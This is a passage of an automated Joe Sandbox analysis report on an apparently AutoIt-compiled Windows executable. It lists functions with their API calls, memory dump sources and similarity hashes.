                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                  • String ID:
                                                                                  • API String ID: 2880819207-0
                                                                                  • Opcode ID: bacafe700697a5b7234cb77b83f72781298feab0784e4e931d339d9e454e0fa6
                                                                                  • Instruction ID: 56fef9bb6f04df13ad863be7d6e99195eac7b241e6eea39c603b1eac7bed09ba
                                                                                  • Opcode Fuzzy Hash: bacafe700697a5b7234cb77b83f72781298feab0784e4e931d339d9e454e0fa6
                                                                                  • Instruction Fuzzy Hash: FE1108B6A04208BFD7119BA8DC05A9E7FBDEF58310F044355F825E3261D6709D08B7B0
                                                                                  Function 0050D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
                                                                                  • GetStockObject.GDI32(00000011), ref: 0050D1CE
                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3970641297-0
                                                                                  • Opcode ID: d8c79bbd07e132d53028059356e2b43efe3e93ac2b58c1cc8f86cd7a0d0576be
                                                                                  • Instruction ID: 8ecbcf8b96bb06dbde07eaf7d66fbada645cc77e3d27a6f31bdf1a817a51ce06
                                                                                  • Opcode Fuzzy Hash: d8c79bbd07e132d53028059356e2b43efe3e93ac2b58c1cc8f86cd7a0d0576be
                                                                                  • Instruction Fuzzy Hash: 5211AD72101509BFEB024F909C55EEEBF79FF18364F040101FA1452090CB319CA0EBB0
                                                                                  Function 00524DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                  • Instruction ID: 27302a4b20b5607121390af3943d57c29175356718bd215a8e21720bb73279f4
                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                  • Instruction Fuzzy Hash: D3014E3204015ABBDF125F84EC058EE3F26BF5A350B598455FA1859075D336CAB1AF82
                                                                                  Function 00517452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00517A0D: __getptd_noexit.LIBCMT ref: 00517A0E
                                                                                  • __lock.LIBCMT ref: 0051748F
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 005174AC
                                                                                  • _free.LIBCMT ref: 005174BF
                                                                                  • InterlockedIncrement.KERNEL32(015C4260), ref: 005174D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                  • String ID:
                                                                                  • API String ID: 2704283638-0
                                                                                  • Opcode ID: 16a4a4de32fed93fef7baaf06c7e259c4967d4b3ecc599a6043fc91dfe6f99d6
                                                                                  • Instruction ID: efd8860d4510172813c69b1c9642d6477b6161a673cb3b0e5afe1b0c388d3284
                                                                                  • Opcode Fuzzy Hash: 16a4a4de32fed93fef7baaf06c7e259c4967d4b3ecc599a6043fc91dfe6f99d6
                                                                                  • Instruction Fuzzy Hash: D901A13190961AABFF12AFA8A4097DDBF70BF49710F144405F81467680CB645DC0DFD2
                                                                                  Function 0055EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0050AFE3
                                                                                    • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050AFF2
                                                                                    • Part of subcall function 0050AF83: BeginPath.GDI32(?), ref: 0050B009
                                                                                    • Part of subcall function 0050AF83: SelectObject.GDI32(?,00000000), ref: 0050B033
                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0055EA8E
                                                                                  • LineTo.GDI32(00000000,?,?), ref: 0055EA9B
                                                                                  • EndPath.GDI32(00000000), ref: 0055EAAB
                                                                                  • StrokePath.GDI32(00000000), ref: 0055EAB9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                  • String ID:
                                                                                  • API String ID: 1539411459-0
                                                                                  • Opcode ID: 6ea428ba3a820c06d2c1b8eb8e5e50403d07f655096b80fa6b4f850cc4dacbf1
                                                                                  • Instruction ID: 3030f77b6ce10e574d71671c383f05938e15f157689cd5f16d650cdcade7b5c2
                                                                                  • Opcode Fuzzy Hash: 6ea428ba3a820c06d2c1b8eb8e5e50403d07f655096b80fa6b4f850cc4dacbf1
                                                                                  • Instruction Fuzzy Hash: 98F05432005655B7DB125FA4AC0EFCE3F396F25311F044201FE15650E187745699EBA9
                                                                                  Function 0052C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0052C84A
                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0052C85D
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0052C864
                                                                                  • AttachThreadInput.USER32(00000000), ref: 0052C86B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2710830443-0
                                                                                  • Opcode ID: 7542ef6e7195644988ad1d6027fd6f17498eac4c1e7003e5fbaa7026e9b723cb
                                                                                  • Instruction ID: 52062102157263f460f0884ba2cc4369bcde62b191bbc0d9bda910e9be294634
                                                                                  • Opcode Fuzzy Hash: 7542ef6e7195644988ad1d6027fd6f17498eac4c1e7003e5fbaa7026e9b723cb
                                                                                  • Instruction Fuzzy Hash: 17E0C0715412247ADB105B62AC0DEDB7F7CEF167A1F408025B50D95491C6718585E7F0
                                                                                  Function 0052B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentThread.KERNEL32 ref: 0052B0D6
                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,0052AC9D), ref: 0052B0DD
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0052AC9D), ref: 0052B0EA
                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,0052AC9D), ref: 0052B0F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                  • String ID:
                                                                                  • API String ID: 3974789173-0
                                                                                  • Opcode ID: afba28116763aef4ef71d89aa42d7af9e4c504e03b503bf1697d42cf62228402
                                                                                  • Instruction ID: 8688115b197944cc7feab2ca9ba3029857e3c955371e0e716df63997b50753e5
                                                                                  • Opcode Fuzzy Hash: afba28116763aef4ef71d89aa42d7af9e4c504e03b503bf1697d42cf62228402
                                                                                  • Instruction Fuzzy Hash: 88E086726012219BE7205FB17C0CB5B3BB8FF66791F018818F645D6080EB348485E770
                                                                                  Function 0050B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 0050B496
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0050B4A0
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0050B4B5
                                                                                  • GetStockObject.GDI32(00000005), ref: 0050B4BD
                                                                                  • GetWindowDC.USER32(?,00000000), ref: 0056DE2B
                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0056DE38
                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0056DE51
                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0056DE6A
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0056DE8A
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0056DE95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1946975507-0
                                                                                  • Opcode ID: 83f8ae847d758888ad237ad69c8cdd4ac84dc720599ab51efc8a0e5d19f692da
                                                                                  • Instruction ID: 90afe4fc0b26d6af1f28db608d6e04390b37bc5035c3090b95fbfcf40023738e
                                                                                  • Opcode Fuzzy Hash: 83f8ae847d758888ad237ad69c8cdd4ac84dc720599ab51efc8a0e5d19f692da
                                                                                  • Instruction Fuzzy Hash: 1CE0ED31600240ABEF216F74BC49BD83F31AF61335F14C666FA79580E1C7724985EB21
                                                                                  Function 0052B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0052B2DF
                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 0052B2EB
                                                                                  • CloseHandle.KERNEL32(?), ref: 0052B2F4
                                                                                  • CloseHandle.KERNEL32(?), ref: 0052B2FC
                                                                                    • Part of subcall function 0052AB24: GetProcessHeap.KERNEL32(00000000,?,0052A848), ref: 0052AB2B
                                                                                    • Part of subcall function 0052AB24: HeapFree.KERNEL32(00000000), ref: 0052AB32
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                  • String ID:
                                                                                  • API String ID: 146765662-0
                                                                                  • Opcode ID: 00a1a336fbc1f8d2ffc68551f105a38956ee16e06e08044fd84c7e6ae3cdcd72
                                                                                  • Instruction ID: 5fc6381986aa3e1f6dffb8086f68eceb4151272b7228146e40b4e32b792d18cc
                                                                                  • Opcode Fuzzy Hash: 00a1a336fbc1f8d2ffc68551f105a38956ee16e06e08044fd84c7e6ae3cdcd72
                                                                                  • Instruction Fuzzy Hash: BCE02F3A104405BBDB016B95FC08859FF76FF993213108621F61981575DB3298B5FB61
                                                                                  Function 0056B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: e350c3457510ac49e5ca414c66c9f20e35af4305b3bdca0dbbe21fa17b94b6f2
                                                                                  • Instruction ID: 722d010b20a01ab90d05df7619b6192ee3504767ab783f57feea0e9bdf1163ce
                                                                                  • Opcode Fuzzy Hash: e350c3457510ac49e5ca414c66c9f20e35af4305b3bdca0dbbe21fa17b94b6f2
                                                                                  • Instruction Fuzzy Hash: 55E01AB5100204EFEB005F70A84CA2D7FB4FF5C350F118805F85E87250DB749884AB60
                                                                                  Function 0056B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2889604237-0
                                                                                  • Opcode ID: 22404435327287697dac327ce435e30697518899aaf4744744b2749d1fe25cc0
                                                                                  • Instruction ID: c53153e4474990b0bf7c8b248eca02939fe9123b332bb629ebfe72d697d0dab8
                                                                                  • Opcode Fuzzy Hash: 22404435327287697dac327ce435e30697518899aaf4744744b2749d1fe25cc0
                                                                                  • Instruction Fuzzy Hash: 9EE012B1500200AFDB005F70A84CA2DBBB8FF5C350F118809F95E8B250DA79A884AB60
                                                                                  Function 0052DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0052DEAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContainedObject
                                                                                  • String ID: AutoIt3GUI$Container
                                                                                  • API String ID: 3565006973-3941886329
                                                                                  • Opcode ID: e0c9dda5f73d66b02a7efd821d0a1ee38ce0013cd4fe83ae21fadc4a2331188d
                                                                                  • Instruction ID: 5cfd5d2fa21ac4dc7f87e3cee82f5eb2343ab46f9e9940929041f644f396726f
                                                                                  • Opcode Fuzzy Hash: e0c9dda5f73d66b02a7efd821d0a1ee38ce0013cd4fe83ae21fadc4a2331188d
                                                                                  • Instruction Fuzzy Hash: AE913970600611AFDB24CF64D889F6ABBF9BF4A710F10846DF94ACB691DB70E841CB60
                                                                                  Function 0053DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050C6F4: _wcscpy.LIBCMT ref: 0050C717
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • __wcsnicmp.LIBCMT ref: 0053DEFD
                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0053DFC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                  • String ID: LPT
                                                                                  • API String ID: 3222508074-1350329615
                                                                                  • Opcode ID: 2737f84cd54d668d618ebed681942d47fc6c9e64c56bf6a14cc9521e3d98b226
                                                                                  • Instruction ID: 8290d421ac7ec20fd8ddb3a6cbc3a4f274de0f981fdbfd4f07d37c44d57d7f6b
                                                                                  • Opcode Fuzzy Hash: 2737f84cd54d668d618ebed681942d47fc6c9e64c56bf6a14cc9521e3d98b226
                                                                                  • Instruction Fuzzy Hash: BB619275A00219AFCB18DF98C896EBEBBF5FF48710F01405AF946AB291D770AE40CB54
                                                                                  Function 0053290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy
                                                                                  • String ID: I/V$I/V
                                                                                  • API String ID: 3048848545-3445170390
                                                                                  • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                  • Instruction ID: f1e79e76aa2f16e9ea5fc6dede700fef3445cbf367ca4f07618b09e57ed5d98d
                                                                                  • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                  • Instruction Fuzzy Hash: A641F436900A1AABCF25EF99D441AFCBFB0FF48714F50505BE981A7191DB706E82C7A4
                                                                                  Function 0050BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000), ref: 0050BCDA
                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0050BCF3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 2783356886-2766056989
                                                                                  • Opcode ID: 40601ce6a844f9bc6dfc183bf0f55e0f2264817b95a711f71a1b8b0a6b2d2fe3
                                                                                  • Instruction ID: b2f18f14f666c305484b9c969dfbd7db101c9b85f73c1526248a1cbb01266985
                                                                                  • Opcode Fuzzy Hash: 40601ce6a844f9bc6dfc183bf0f55e0f2264817b95a711f71a1b8b0a6b2d2fe3
                                                                                  • Instruction Fuzzy Hash: 04511571408745ABE320AF54D88ABAFBBE8FBD5354F414C4DF1C8420A6DF7089AC9B56
                                                                                  Function 0053C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F44ED: __fread_nolock.LIBCMT ref: 004F450B
                                                                                  • _wcscmp.LIBCMT ref: 0053C65D
                                                                                  • _wcscmp.LIBCMT ref: 0053C670
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
